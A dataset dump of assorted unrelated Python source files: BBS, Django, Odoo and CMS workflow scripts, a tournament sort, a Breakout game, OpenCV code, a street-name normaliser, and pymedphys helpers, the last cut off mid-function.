text stringlengths 38 1.54M |
|---|
###
### This file is part of Pyffle BBS.
###
### Pyffle BBS is free software: you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation, either version 3 of the License, or
### (at your option) any later version.
###
### Pyffle BBS is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with Foobar. If not, see <http://www.gnu.org/licenses/>.
###
###
## Models for SqlAlchemy version 6
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relation, backref
from sqlalchemy import *
from sqlalchemy.dialects.postgresql import *
from sqlalchemy.orm import sessionmaker
from pyffle_tables import *
from pyffle_data import *
from pyffle_editor import Editor
from datetime import datetime
import sys
import getpass
import os
import tempfile
import random
import copy
def getIdentity():
return "pyffle_cookie v0.23"
## Returns True if the version of pyffle is compatible this version of module
def confirmVersion(version):
return True
class PyffleModule:
currentUser = None
data = None
def eventDispatched(self, event):
pass
def displayCookie(self):
self.data.stateChange("cookie_cookiedisplaystart")
## first get the static cookies
cookies = copy.deepcopy(self.data.getStaticCookies())
## now load any added ones
messageIds = self.data.getMessagesByBoardname("__pyffle_cookie")
for msgid in messageIds:
for msgtext in self.data.getMessagetexts(msgid):
cookies.append(msgtext)
## pick a random cookie and display it
if not cookies == None:
if len(cookies) > 0:
random.seed()
cookie = random.choice(cookies)
self.data.util.printPaged(cookie)
self.data.stateChange("cookie_cookiedisplayend")
def go(self, command, args):
if command=="justacookie":
self.data.stateChange("cookie_justacookiestart")
self.displayCookie()
self.data.stateChange("cookie_justacookieend")
if command=="cookie" or command=="oreo":
self.data.stateChange("cookie_cookiestart")
self.displayCookie()
self.data.stateChange("cookie_cookieend")
self.data.stateChange("cookie_cookieaddstart")
subject = ""
theText = self.data.util.prompt("\nEnter cookie, but no bufu.\n:")
theText.strip()
if not theText == "":
self.data.stateChange("cookie_gotcookiestart")
self.data.util.printn("\nStoring cookie..")
sentId = self.data.createMessage(self.currentUser.username,None,subject.strip(),theText,board="__pyffle_cookie")
self.data.util.println("Cookie stored.\n")
self.data.stateChange("cookie_gotcookieend")
else:
self.data.stateChange("cookie_nocookiestart")
self.data.util.println("\nSpoilsport. No cookie for you.\n")
self.data.stateChange("cookie_nocookieend")
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError
import xlrd,base64,datetime
class ImportWizard(models.TransientModel):
_name = 'import.wizard'
name = fields.Char(default=u'导入excel', string=u'')
data = fields.Binary(string=u'文件')
# 数据导入
@api.multi
def import_excel(self):
if self.data:
excel_obj = xlrd.open_workbook(file_contents=base64.decodestring(self.data))
sheets = excel_obj.sheets()
upc_obj = self.env['upc.code']
product_obj = self.env['product.product']
for sh in sheets:
for row in range(0, sh.nrows):
code = sh.cell(row, 0).value
code = code.replace(' ', '')
if type(code) is not unicode:
raise UserError(u'%s 编码必须为文本类型,不能为数字格式' % code)
result = upc_obj.sudo().search([('name', '=', code)])
if result:
continue
product = product_obj.sudo().search([('upc', '=', code)])
if product:
continue
upc_obj.create({'name': code})
return {
'name': u'UPC编码',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'tree',
'res_model': 'upc.code',
}
|
from django import forms
#from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
#Need the next two lines because my User is actually accounts.User.
from django.contrib.auth import get_user_model
User = get_user_model()
#This is where to add extra fields to the user signup form.
#I added "email" to the form. Didn't need to add it to the user model because the
#native user model already includes that.
class MyUserCreationForm(UserCreationForm):
email = forms.EmailField(required=True)
#Added this so users can see family's stuff.
#first_name = forms.CharField(required=False, help_text="family's secret password")
class Meta:
model = User
#This is where I specified the fields the user will see on the signup form.
fields = ("username", "email", "password1", "password2")
def save(self, commit=True):
user = super(MyUserCreationForm, self).save(commit=False)
#Because I added this to the form it didn't go through "is_valid."
#So I need to put it through the "cleaned_data" attribute before saving..
user.email = self.cleaned_data["email"]
if commit:
user.save()
return user
|
from django.contrib import admin
from .models import Profile
from .models import Stuff
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
list_display = ('id', 'external_id', 'tg_username', 'first_name',
'last_name', 'contact')
@admin.register(Stuff)
class StuffAdmin(admin.ModelAdmin):
list_display = ('description', 'profile', 'image_url', 'status_like_users')
# Register your models here.
|
#!/usr/bin/env python
import httplib
import urllib
import sys,os
import datetime
def makeRequest(url,params):
encodedParams = urllib.urlencode(params)
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
#conn = httplib.HTTPSConnection(url, cert_file = os.getenv('X509_USER_PROXY'), key_file = os.getenv('X509_USER_PROXY'))
conn = httplib.HTTPConnection(url)
conn.request("POST", "/reqmgr/create/makeSchema", encodedParams, headers)
response = conn.getresponse()
data = response.read()
if response.status != 303:
print 'could not post request with following parameters:'
for item in params.keys():
print item + ": " + str(params[item])
print 'Response from http call:'
print 'Status:',response.status,'Reason:',response.reason
print 'Explanation:'
print data
print "Exiting!"
sys.exit(1)
workflow=data.split("'")[1].split('/')[-1]
print 'Injected workflow:',workflow,'into',url
conn.close()
return workflow
def approveRequest(url,workflow):
params = {"requestName": workflow,
"status": "assignment-approved"}
encodedParams = urllib.urlencode(params)
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
#conn = httplib.HTTPSConnection(url, cert_file = os.getenv('X509_USER_PROXY'), key_file = os.getenv('X509_USER_PROXY'))
conn = httplib.HTTPConnection(url)
conn.request("PUT", "/reqmgr/reqMgr/request", encodedParams, headers)
response = conn.getresponse()
if response.status != 200:
print 'could not approve request with following parameters:'
for item in params.keys():
print item + ": " + str(params[item])
print 'Response from http call:'
print 'Status:',response.status,'Reason:',response.reason
print 'Explanation:'
data = response.read()
print data
print "Exiting!"
sys.exit(1)
conn.close()
print 'Approved workflow:',workflow
return
def assignRequest(url,workflow,team,site,era,procversion,activity):
params = {"action": "Assign",
"Team"+team: "checked",
"SiteWhitelist": site,
"SiteBlacklist": [],
"MergedLFNBase": "/store/user/meloam",
"UnmergedLFNBase": "/store/user/meloam",
"ForceUserOutput" : 1,
"ForceUserStorage" : 1,
"MinMergeSize": 2147483648,
"MaxMergeSize": 4294967296,
"SoftTimeout": 3600 * 24,
"GracePeriod": 3600 * 24,
"MaxMergeEvents": 50000,
"AcquisitionEra": era,
"ProcessingVersion": procversion,
"maxRSS": 4294967296,
"maxVSize": 4294967296,
"dashboard": activity,
"checkbox"+workflow: "checked"}
encodedParams = urllib.urlencode(params, True)
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
conn = httplib.HTTPConnection(url)
conn.request("POST", "/reqmgr/assign/handleAssignmentPage", encodedParams, headers)
response = conn.getresponse()
if response.status != 200:
print 'could not assign request with following parameters:'
for item in params.keys():
print item + ": " + str(params[item])
print 'Response from http call:'
print 'Status:',response.status,'Reason:',response.reason
print 'Explanation:'
data = response.read()
print data
print "Exiting!"
sys.exit(1)
conn.close()
print 'Assigned workflow:',workflow,'to site:',site,'with processing version',procversion
return
# read configs.txt
config = {}
# ReqMgr url
url = "se2.accre.vanderbilt.edu:8685"
site = "T2_US_Vanderbilt"
# site = "T2_US_Vanderbilt"
# site = "T1_FR_CCIN2P3"
# site = "T3_US_Colorado"
team = "testingteam"
# team = "testbed-processing"
era = "MeloAcquistionEra2"
activity = "integration"
procversion = "IntegrationTest_" + datetime.datetime.now().strftime("%y%m%d")
# change RequestString before every usage
params = {"CMSSWVersion": 'CMSSW_5_2_2',
"GlobalTag": 'START52_V5::All',
"MergedLFNBase" : "/store/user/meloam",
"UnmergedLFNBase" : "/store/user/meloam",
"ForceUserOutput" : 1,
"ForceUserStorage" : 1,
"SiteWhitelist" : "T2_US_Vanderbilt",
"RequestString": 'T2stop_600_250_0_75v8',
"RequestPriority": 300000,
"TimePerEvent": 1000,
"FilterEfficiency": 1,
"ScramArch": 'slc5_amd64_gcc462',
"RequestType" : "LHEStepZero",
"RequestNumEvents": 100000,
"inputMode": "couchDB",
"CouchURL":"http://se2.accre.vanderbilt.edu:5985",
"CouchDBName":"wmagent_configcache",
# the full config
#"ProcConfigCacheID": '1c73b6c3cbc6254dea3c3473be6cde49',
# the fnal config bddd8738547bf9bab08d30c57b17ae59
# the gpfs config c6e4c48118fee0605b67cb8abf557346
"ProcConfigCacheID": '37916fe37672f725a17bf70a25e21a8a',
"EventsPerLumi": 1,
"PrimaryDataset": 'T2stop_600_250_0_75',
"DataPileup": "",
"filterEfficiency": 1,
"MCPileup": "",
"FirstEvent": 1,
"DataTier": 'USER',
"Memory": 2000000000,
"SizePerEvent":1024*1024,
"maxRSS": 4294967296,
"maxVSize": 4294967296,
"SoftTimeout": 3600 * 24,
"FirstLumi": 1,
"AcquisitionEra":era,
"PrepID": 'MCTEST-GEN-0001',
"ForceUserOutput" : 1,
"Requestor": 'meloam',
"RequestorDN": '/DC=org/DC=doegrids/OU=People/CN=Andrew Malone Melo 788499',
'DbsUrl': 'https://cmsdbsprod.cern.ch:8443/cms_dbs_ph_analysis_02_writer/servlet/DBSServlet',
"Group": 'testing',
"TotalTime": 14400, #job length in sec.
"userSandbox": "root://xrootd.unl.edu//store/user/meloam/sandboxes/gensandbox2.tgz",
}
# make request
workflow = makeRequest(url,params)
approveRequest(url,workflow)
assignRequest(url,workflow,team,site,era,procversion,activity)
|
"""This module contains tournament_sort and other helper functions.
You can run a test using this command:
python3 -m doctest tournament_sort.py -v
or just
python3 tournament_sort.py [--verbose]
"""
# This module can be executed as module and script and by doctest.
if __name__ == "__main__" or __name__ == "tournament_sort":
from common.util import *
else:
from .common.util import *
from collections import deque
from math import *
def left_child(collection, node):
return (2 * node) - len(collection) - 1
def right_child(collection, node):
return (2 * node) - len(collection)
def parent(collection, node):
return (node + len(collection) + 1) // 2
def match(collection, left, right, index_mapper=lambda x: x):
"""Compare and return the winner.
The small one wins. If same, the left wins.
If one is None, the other one wins.
If both are None, the winner is None.
Args:
collection (list): A collection that contains players.
left (int): Index of a player at left.
right (int): Index of a player at right.
index_mapper (int -> int): Mapper to map given index left and right
to the index of the collection. We do not directly pass the index of items
in collection, so we might need the index mapper.
Returns:
int: Index of the winner in the collection.
Example:
>>> match([1, 2, 3, 4], 1, 3, lambda x: [4, 3, 2, 1][x])
1
>>> match([1, 1, 1, 1], 0, 3, lambda x: [2, 2, 2, 2][x])
2
"""
left = index_mapper(left)
right = index_mapper(right)
if left is None and right is None:
return None
elif left is None:
return right
elif right is None:
return left
return left if collection[left] <= collection[right] else right
def print_tournament_tree(collection, tree):
if len(collection) == 0:
print("Tree empty.")
return
line_capacity = 1
line_count = 0
padding = 2**ceil(log2(len(tree)))
for tree_index in range(len(tree) - 1, -1, -1):
element = "*" if tree[tree_index] is None else str(collection[tree[tree_index]])
print_padding(element, padding, end="")
line_count += 1
if line_count >= line_capacity:
print("")
padding //= 2
line_capacity *= 2
line_count = 0
def construct_tournament_tree(collection):
"""Build a tournament tree from given items in collection.
This function modifies the collection.
The tree will be represented in a list, from the leafs, not the root.
For example, [2, 1, 3, *, 5, 6, 7] represents a tree below:
7
5 6
2 1 3 *
In this representation the index of the left child is (2i - l - 1),
where l is total heap size, and that of the right child is (2i - l).
The index of the parent node will be (i + l + 1) / 2.
Args:
collection (list): Initial data. They will not be modified.
Returns:
list: A Tournament tree where each node holds item index of
original collection.
Example:
>>> construct_tournament_tree([2, 1, 3, 8, 5, 6, 7])
[0, 1, 2, 3, 4, 5, 6, None, 1, 2, 4, 6, 1, 4, 1]
>>> construct_tournament_tree([5, 4, 3, 2, 1])
[0, 1, 2, 3, 4, None, None, None, 1, 3, 4, None, 3, 4, 4]
"""
if len(collection) == 0:
return [None]
# Get nearst 2^k >= len(collection), where k is integer.
designated_leaf_count = 2**ceil(log2(len(collection)))
# The size of the tree will be 2 * designated_leaf_count - 1.
heap_size = (designated_leaf_count * 2) + 1
# Indices of the collection.
indices = list(range(0, len(collection)))
# Empty part of leaf level.
padding = [None] * (designated_leaf_count - len(collection))
# A tree taht will be used as a tournament tree.
# Every element will hold a key to an element,
# which is the index of the item in collection.
tree = indices + padding
for i in range(0, heap_size - 3, 2):
winner = match(collection, i, i + 1, index_mapper=lambda x: tree[x])
tree.append(winner)
return tree
def retrace_tournament_tree(collection, tree, node):
"""Run a partial rematch from specific node to the root.
Run a match beteen left child of node and right one of it.
Do it recursively until it gets to the root.
Args:
collection (list): Original data to refer.
tree (list): A tournament tree.
node (int): Index of node in the tree.
Returns:
list: Retraced tournament tree. The tree modified.
Example:
>>> retrace_tournament_tree([2, 1, 3, 8, 5, 6, 7], [0, None, 2, 3, 4, 5, 6, None, 1, 2, 4, 6, 1, 4, 1], 1)
[0, None, 2, 3, 4, 5, 6, None, 0, 2, 4, 6, 0, 4, 0]
"""
# Do when node is not a leaf node.
if node > (len(tree) // 2):
left = left_child(tree, node)
right = right_child(tree, node)
winner = match(collection, left, right, index_mapper=lambda x: tree[x])
tree[node] = winner
if node < len(tree) - 1:
return retrace_tournament_tree(collection, tree, parent(tree, node))
else:
return tree
def tournament_sort(collection, verbose=False):
"""Implementation of tournament sort in Python.
Args:
collection (list): Input to sort.
verbose (bool): Print every rotation if true.
Returns:
list: The same as the collection, with sort ascending applied.
Example:
>>> tournament_sort([3, 1, 7, 0, 4, 8, 2])
[0, 1, 2, 3, 4, 7, 8]
>>> tournament_sort([-91, -123, -1])
[-123, -91, -1]
>>> tournament_sort([])
[]
"""
output = []
tree = construct_tournament_tree(collection)
if verbose:
print("Tournament tree constructed:")
print_tournament_tree(collection, tree)
print("")
# Root of the tree points to the minumum value in the collection.
winner_index = tree[-1]
while winner_index is not None:
if verbose:
print("Run tournament.")
print("Winner is " + str(collection[winner_index]) + ".")
print("The tree looks like:")
print_tournament_tree(collection, tree)
print("")
# Add winner to the output.
output.append(collection[winner_index])
# The winner_index is not only an index of collection,
# but also an index of the tree.
# It is possible to locate index of the winner in the tree
# because the winner comes from the leaf and the leafs form
# a range from 0 to len(collection) - 1.
# Unless the root is None, we can figure out where the winner came from.
tree[winner_index] = None
retrace_tournament_tree(collection, tree, winner_index)
winner_index = tree[-1]
return output
if __name__ == "__main__":
from common.invoker import from_input
from_input(tournament_sort)
|
#!/usr/bin/python
import cgi, cgitb, os, commands
cgitb.enable()
print "Content-type: text/html \n\n"
#data=cgi.FieldStorage()
##############################################################
name= 'cent_os5'
ram= '512'
core= '1'
port= '8991'
machine_id= 'first'
#name=data.getvalue('os_name')
#ram=data.getvalue('ram')
#core=data.getvalue('vcpu')
#port=data.getvalue('port')
#machine_id=data.gevalue('name')
#############################################################
#install_machine=commands.getstatusoutput("sudo virt-install --graphics vnc,listen=192.168.1.100,port={} --cdrom /var/lib/libvirt/images/CentOS-7-x86_64-Minimal-1810.iso --disk none --memory {} --vcpus {} --name {} ".format(port,ram,core,name))
vnc_start=commands.getstatusoutput("websockify -D --web=/usr/share/novnc --cert=/etc/pki/tls/certs/novnc.pem 6080 localhost:5901".format(port))
#print install_machine
print vnc_start
|
def main():
t = int(input()) # read a line with a single integer
for i in range(1, t + 1):
n = int(input())
print(("Case #{}: " + solve_problem(n)).format(i))
# print("Case #{}: {} {}".format(i, n + m, n * m))
def solve_problem(n):
pass
if __name__ == '__main__':
main()
|
from unittest import skip
from django.test import TestCase
from mapstory.models import ContentMixin
class TestContentMixin(TestCase):
def setUp(self):
self.contentMixin = ContentMixin(content="<a href=%s target='_'>")
def test_import(self):
self.assertIsNotNone(ContentMixin)
@skip("Fix this")
def test_save_and_retrieve(self):
self.contentMixin.save()
saved = ContentMixin.objects.all()
self.assertEqual(saved.count, 1)
def test_html(self):
self.assertTrue(self.contentMixin.html().strip().startswith("<"))
self.assertTrue(self.contentMixin.html().endswith(">"))
|
from django.shortcuts import render_to_response
def login(request):
return render_to_response("index.html")
def Pagina_Principal(request):
return render_to_response("Principal.html")
def Registro_Usuario(request):
return render_to_response("Registro.html")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append("/Services/ElasticsearchWatcher/config")
import datetime, db, sendMail, logMaster, sourceCalc, ConfigParser, os, time, hashlib, math, re, sys
# ConfigParser object create
config = ConfigParser.ConfigParser()
# logMaster object create
logger = logMaster.Logger()
# sourceCalc object create
calc = sourceCalc.Calculate()
# Db object create
db = db.Db()
if __name__ == "__main__":
try:
while True:
config.read("/Services/ElasticsearchWatcher/config/config.cfg")
try:
system_list = config.get("env","system_members").split(",")
except:
system_list = [config.get("env","system_members")]
for el_server in system_list:
if calc.calc(el_server):
pass
time.sleep(30)
except KeyboardInterrupt:
print "\n\tScript sonlandırıldı.Görüşmek Üzere =)\n"
sys.exit(0)
|
# Aaron Donnelly
# Computing the primes.
# My list of comments to TBD
P = []
#Loop through all of the numbers we're checking for primality.
for i in range (2,10000):
# Assume that i is a prime
isprime = True
# Loop through all values from 2 up to but not including
for j in range(2,i):
# See if J divides i
if i % j ==0:
#If it doest, its isnt prime to exit the loop
isprime = False
break
# If i is prime then append to P
if isprime:
P.append(i)
print(P)
|
try: # pre 1.6
from django.conf.urls.defaults import url, patterns
except ImportError:
from django.conf.urls import url # after 1.8
from .views import ajaximage
urlpatterns = [
url(
'^upload/(?P<upload_to>.*)/(?P<max_width>\d+)/(?P<max_height>\d+)/(?P<crop>\d+)/(?P<valid_width>\d+)/(?P<valid_height>\d+)/(?P<max_bytes>\d+)',
ajaximage,
name='ajaximage'
),
]
|
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
Bricks Breakout Game!
Three lives and let's see how good you are!
author: sheng-hao wu
description: class/object/method defined file
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7.0 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
MIN_X_SPEED = 1 # Minimum initial horizontal speed for the ball.
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space.
window_width = brick_cols * (brick_width + brick_spacing) + brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) + brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
# Create a paddle.
self.paddle = GRect(paddle_width, paddle_height, x=(window_width - paddle_width)/2, y=window_height - paddle_height - paddle_offset)
self.obj_fill_color_add(self.paddle, "black")
# Center a filled ball in the graphical window.
self.ball = GOval(ball_radius, ball_radius, x=(window_width - ball_radius) / 2, y=(window_height - ball_radius)/2)
self.obj_fill_color_add(self.ball, "black")
# Default initial velocity and direction control for the ball.
self.init_ball_velocity()
# Game flow control related
self.ball_active = False
self.remained_life = 0
self.remained_bricks = brick_cols * brick_rows
# Initialize our mouse listeners.
#only when mouse clicked would active the game
onmouseclicked(self.game_active)
onmousemoved(self.move_paddle)
# Draw bricks.
# brick colors selections
bricks_colors = ["red", "orange", "yellow", "green", "blue"]
# init bricks[1] ~ bricks[101], bricks[0] no use leave it as "None"
self.bricks = [None] * 101
for col in range(1, brick_cols + 1):
for row in range(1, brick_rows + 1):
self.bricks[col * row] = GRect(brick_width, brick_height, x=col * (brick_spacing + brick_width) - brick_width, y=row * (brick_spacing + brick_height) - brick_height)
self.obj_fill_color_add(self.bricks[col * row], bricks_colors[(row - 1)//2])
# getter for ball dx
def get_ball_dx(self):
return self.__dx
# setter for ball dx
def set_ball_dx(self, val):
self.__dx = val
return self.__dx
# getter for ball dx_right
def get_ball_dx_right(self):
return self.__dx_right
# setter for ball dx_right
def set_ball_dx_right(self, val):
self.__dx_right = val
return self.__dx_right
# getter for ball dy
def get_ball_dy(self):
return self.__dy
# setter for ball dy
def set_ball_dy(self, val):
self.__dy = val
return self.__dy
# getter for ball dy_down
def get_ball_dy_down(self):
return self.__dy_down
# setter for ball dy_down
def set_ball_dy_down(self, val):
self.__dy_down = val
return self.__dy_down
def init_ball_velocity(self):
self.__dx = random.randint(MIN_X_SPEED, MAX_X_SPEED)
if random.random() > 0.5:
self.__dx = -self.__dx
if self.__dx > 0:
self.__dx_right = True
else:
self.__dx_right = False
self.__dy = INITIAL_Y_SPEED
self.__dy_down = True
# func for paddle track mouse.x position
def move_paddle(self, mouse):
if 0 + self.paddle.width/2 <= mouse.x <= self.window.width - self.paddle.width/2:
self.paddle.x = mouse.x - self.paddle.width/2
# func to active game
def game_active(self, mouse):
self.ball_active = True
# reset ball's position
def reset_ball_position(self):
self.ball.x = (self.window.width - self.ball.width) / 2
self.ball.y = (self.window.height - self.ball.height) / 2
# func helps fill and add object
def obj_fill_color_add(self, obj, color):
obj.color = color
obj.filled = True
obj.fill_color = color
self.window.add(obj)
|
import cv2 as cv
import numpy as np
image = cv.imread('/home/ash/opencv_projects/images/book.jpeg')
# color filtering
# cap = cv.VideoCapture(0)
# while True:
# ret,frame = cap.read()
# hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
# lower_red = np.array([10,130,140])# 5,230,230 for blue the values inside is for green 40,100,100
# upper_red = np.array([220,255,255])# basically we give range in bgr and detect the color in that particular range 220,255,255 80,255,255
# mask = cv.inRange(hsv,lower_red,upper_red)
# res = cv.bitwise_and(frame,frame,mask = mask )# to perform bitwise end between 2 identical frames which will result in the same page and masking it between lower_red and upper_end
# kernel = np.ones([10,10],np.uint8)/100
# smoothed = cv.filter2D(res,-1,kernel)
# median_blur = cv.medianBlur(res,15)
# gaussian_blur = cv.GaussianBlur(res,(15,15),0)
# # erosion
# erosion = cv.erode(mask,kernel,iterations=1)
# dilation = cv.dilate(mask,kernel,iterations=1)
# opening = cv.morphologyEx(mask,cv.MORPH_OPEN,kernel)
# closing = cv.morphologyEx(mask,cv.MORPH_CLOSE,kernel)
# cv.imshow('opening',opening)
# cv.imshow('closing',closing)
#cv.imshow('erosion',erosion)
#cv.imshow('dilation1',dilation)
# cv.imshow("gaussian blur",gaussian_blur)
# cv.imshow('median_blur',median_blur)
# cv.imshow('smooth',smoothed)
# cv.imshow('res',res)
# if cv.waitKey(1) & 0xFF == ord('q'):
# break
cv.circle(image,(122,5),1,(255,0,0),3)
cv.circle(image,(253,31),1,(255,1,1),3)
cv.circle(image,(4,88),1,(255,0,0),3)
cv.circle(image,(152,192),1,(255,0,0),3)
points1 = np.float32([[4,88],[152,192],[122,5],[253,31]])
points2 = np.float32([[0,0],[253,0],[0,192],[253,192]])
m = cv.getPerspectiveTransform(points1,points2)
transformed_image = cv.warpPerspective(image,m,(253,192))
cv.imshow("transformed image",transformed_image)
cv.imshow("goku",image)
cv.waitKey(0)
|
# -*- coding: iso-8859-15 -*-
"""
Normalize street name using Italian OSM conventions:
https://wiki.openstreetmap.org/wiki/IT:Key:name
Copyright (C) 2014-2015 Andrea Musuruane <musuruan@gmail.com>
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public
License as published by the Free Software Foundation; either
version 2 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this library; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301, USA.
"""
__author__ = "Andrea Musuruane <musuruan@gmail.com>"
__version__ = "1.2"
__date__ = "29 May 2015"
import re
import sys
def translateName(streetName):
words = [
# Preposizioni
"ai ",
"al ",
"alla ",
"alle ",
"d'",
"da ",
"di ",
"de ",
"per ",
# Preposizioni articolate
"dal ",
"della ",
"delle ",
"del ",
"dei ",
"dello ",
"degli ",
"dell'",
# Congiunzioni
"e ",
"ed ",
# Altre parole
"antica ",
"privata ",
"vecchia "
]
abbreviations = {
"COL.": "COLONNELLO",
"F.LLI": "FRATELLI",
}
dug_abbreviations = {
"C.DA": "CONTRADA",
"C.LE": "CORTILE",
"C.LLA": "CORTICELLA",
"C.NE": "CIRCONVALLAZIONE",
"C.SO": "CORSO",
"G.RIA": "GALLERIA",
"IN.TO": "INTERRATO",
"L.GE": "LUNGADIGE",
"L.GO": "LARGO",
"P.LE": "PIAZZALE",
"P.TTA": "PIAZZETTA",
"P.TTI FONT.LLE": "PORTICHETTI FONTANELLE",
"P.ZZA": "PIAZZA",
"R.STE": "REGASTE",
"S.DA": "STRADA",
"S.LLA": "STRADELLA",
"S.NE": "STRADONE",
"S.TA": "SALITA",
"SC.NE": "SCALONE",
"SC.TA": "SCALETTA",
"V.GIO": "VILLAGGIO",
"V.LE": "VIALE",
"V.LO": "VICOLO",
"V.TTO": "VICOLETTO"
}
# Fix DUG (DUG = "denominazione urbanistica generica")
for dug in dug_abbreviations:
if streetName[:len(dug)+1] == dug + " ":
streetName = dug_abbreviations[dug] + streetName[len(dug):]
break
# Remove abbreviations
for abbreviation in abbreviations:
streetName = streetName.replace(abbreviation, abbreviations[abbreviation])
# Capitalize name
streetName = streetName.strip().title()
# Don't use capital letter for these words
for word in words:
streetName = streetName.replace(word.title(), word)
# Full stop must be followed by a space
streetName = re.sub(r"\.(\S)", r". \1", streetName)
# Remove multiple spaces
streetName = re.sub(r"\s\s+", " ", streetName)
return streetName
|
def reponse():
"""Réponse à l'exo 6"""
S = 0
n = 1
# S = u_{n-1}
while S < 1000:
# S = u_{n-1}
S = S + n**(-.5)
# S = u_n
n = n+1
# S = u_{n-1}
# S = u_{n-1} et c'est la première valeur de u >=1000
return n-1
def valeur_u(n):
"""Renvoie u_n"""
S = 0
for k in range(1,n+1):
S = S + k**-.5
return S
def reponse2():
"""Réponse à l'exo 6"""
S,n = 0,0
while S < 10**3:
# Inv : S = u_n
n = n+1
S = S + n**-.5
return n
|
# Copyright (C) 2019 Cancer Care Associates
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymedphys._imports import matplotlib
from pymedphys._imports import numpy as np
import pymedphys._utilities.createshells
def transform_penumbra_points(points_at_origin, centre, rotation):
transform = translate_and_rotate_transform(centre, rotation)
xx_left_right, yy_left_right, xx_top_bot, yy_top_bot = points_at_origin
xx_left_right_transformed, yy_left_right_transformed = apply_transform(
xx_left_right, yy_left_right, transform
)
xx_top_bot_transformed, yy_top_bot_transformed = apply_transform(
xx_top_bot, yy_top_bot, transform
)
return (
xx_left_right_transformed,
yy_left_right_transformed,
xx_top_bot_transformed,
yy_top_bot_transformed,
)
def translate_and_rotate_transform(centre, rotation):
transform = matplotlib.transforms.Affine2D()
try:
transform.rotate_deg(-rotation)
transform.translate(*centre)
except ValueError:
print(centre, rotation)
raise
return transform
def define_penumbra_points_at_origin(edge_lengths, penumbra):
penumbra_range = np.linspace(-penumbra / 2, penumbra / 2, 11)
def _each_edge(current_edge_length, orthogonal_edge_length):
half_field_range = np.linspace(
-orthogonal_edge_length / 4, orthogonal_edge_length / 4, 51
)
a_side_lookup = -current_edge_length / 2 + penumbra_range
b_side_lookup = current_edge_length / 2 + penumbra_range
current_axis_lookup = np.concatenate([a_side_lookup, b_side_lookup])
return current_axis_lookup, half_field_range
edge_points_left_right = _each_edge(edge_lengths[0], edge_lengths[1])
edge_points_top_bot = _each_edge(edge_lengths[1], edge_lengths[0])
xx_left_right, yy_left_right = np.meshgrid(*edge_points_left_right)
xx_top_bot, yy_top_bot = np.meshgrid(*edge_points_top_bot[::-1])
return xx_left_right, yy_left_right, xx_top_bot, yy_top_bot
def transform_rotation_field_points(points_at_origin, centre, rotation):
transform = translate_and_rotate_transform(centre, rotation)
xx_flat, yy_flat = points_at_origin
tranformed_xx, transformed_yy = apply_transform(xx_flat, yy_flat, transform)
return tranformed_xx, transformed_yy
def define_rotation_field_points_at_origin(edge_lengths, penumbra):
x_half_range = edge_lengths[0] / 2 + penumbra / 2
y_half_range = edge_lengths[1] / 2 + penumbra / 2
num_x = np.ceil(x_half_range * 2 * 8) + 1
num_y = np.ceil(y_half_range * 2 * 8) + 1
x = np.linspace(-x_half_range, x_half_range, int(num_x))
y = np.linspace(-y_half_range, y_half_range, int(num_y))
xx, yy = np.meshgrid(x, y)
xx_flat = np.ravel(xx)
yy_flat = np.ravel(yy)
inside = np.logical_and(
(np.abs(xx_flat) < x_half_range), (np.abs(yy_flat) < y_half_range)
)
xx_flat = xx_flat[np.invert(inside)]
